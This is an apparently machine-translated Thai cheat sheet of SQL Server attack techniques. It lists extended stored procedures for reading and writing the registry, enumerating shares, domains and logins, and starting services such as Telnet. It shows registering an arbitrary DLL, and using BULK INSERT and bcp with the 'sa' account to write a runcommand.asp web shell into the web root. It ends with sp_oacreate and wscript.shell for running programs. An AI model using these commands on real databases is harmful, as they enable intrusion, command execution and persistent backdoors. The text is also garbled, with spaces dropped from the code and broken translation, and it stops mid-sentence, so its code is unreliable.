ส่วนขยาย SQL บางส่วน
xp_regaddmultistring
XP_REGDELETEKEY DELETE NAME
xp_regdeletevaluate ค่าคีย์
xp_regenumkeys enum
xp_regenumvalues
xp_regread สำหรับ
xp_regremovemultistring
xp_regwrite เขียน
ไดรฟ์ View XP_AvailableMedia
ไดเรกทอรี xp_dirrtree view
แหล่งข้อมูล XP_ENUMDSNODBC
ข้อมูล xp_loginconfig เกี่ยวกับการกำหนดค่าความปลอดภัยของเซิร์ฟเวอร์บางส่วน
แพ็คเกจ XP_MAKECAB สามารถใช้สิทธิ์ DBO ได้ก่อน
xp_ntsec_enumdomains enum ชื่อโดเมนข้อมูลที่เกี่ยวข้อง
XP_Terminate_Process Process และ IP กระบวนการและ IP
บัญชี XP_LOGININFO ปัจจุบันเข้าสู่ระบบบัญชี
sp_configure ดึงเนื้อหาในฐานข้อมูล (ฉันคิดว่าสิ่งนี้ค่อนข้างมีประโยชน์)
sp_helpextendedproc ได้รับส่วนขยายการจัดเก็บทั้งหมด
ผู้ใช้สืบค้น SP_WHO2 โฮสต์ที่พวกเขาเข้าสู่ระบบการดำเนินการที่พวกเขาดำเนินการในฐานข้อมูล ฯลฯ
ข้อมูลเครือข่ายบางส่วน
execxp_regreadhkey_local_machine
'System/CurrentControlset/Services/LanManserver/Parameters'
'nullsessionshares'
การตรวจสอบเครือข่ายช่วย SNMP
execxp_regenumvalueshkey_local_machine
'System/CurrentControlset/Services/SNMP/พารามิเตอร์/ValidComm
หน่วย '
เริ่มบริการระบบบางอย่างเช่น Telnet และคุณสามารถมาที่ Admin หรือรหัสผ่านระบบบางอย่าง
Execmaster..xp_serviceControl'Start ',' กำหนดการ '
Execmaster..xp_serviceControl'Start ',' เซิร์ฟเวอร์ '
sp_addextendedproc'xp_webserver ',' c: /temp/xp_foo.dll 'ส่วนขยายนี้สามารถเรียกใช้โปรแกรม
ใช้ไวยากรณ์ 'Bulkinsert' เพื่อแทรกไฟล์ข้อความลงในตารางชั่วคราว เพียงสร้างตารางนี้:
CreateTeableFoo (Linevarchar (8000))
จากนั้นดำเนินการ Bulkinsert เพื่อแทรกข้อมูลในไฟล์ลงในตารางเช่น:
bulkinsertfoofrom'c: /inetpub/wwwroot/admin/inc.asp '
bcp "เลือก*fromtext..foo" queryoutc: /inetpub/wwwroot/runcommand.asp-c-slocalhost-usa-pfoobar
พารามิเตอร์ 'S' คือเซิร์ฟเวอร์ที่เรียกใช้การสืบค้นพารามิเตอร์ 'U' คือชื่อผู้ใช้พารามิเตอร์ 'P' คือรหัสผ่านนี่คือ 'foobar'
ขั้นตอนที่เก็บไว้ในตัวหลายขั้นตอนมีให้ใน SQLServer ที่อนุญาตให้สร้างสคริปต์อัตโนมัติ ActiveX สคริปต์เหล่านี้เหมือนกับสคริปต์ที่ทำงานภายใต้ Windows Script Interpreter หรือโปรแกรมสคริปต์ ASP - พวกเขาใช้ VBScript หรือ JavaScript เพื่อสร้างและโต้ตอบกับพวกเขา สคริปต์การดำเนินการอัตโนมัติที่ใช้วิธีนี้สามารถทำอะไรก็ได้ใน Transact-SQL ในสคริปต์ ASP หรือในสคริปต์ WSH
ใช้วัตถุ 'wscript.shell' เพื่อสร้างอินสแตนซ์ของ Notepad:
ประกาศ@oint
execsp_oacreate'wscript.shell ',@oout
execsp_oamethod@o, 'run', null, 'notepad.exe'
ระบุเพื่อดำเนินการหลังจากชื่อผู้ใช้: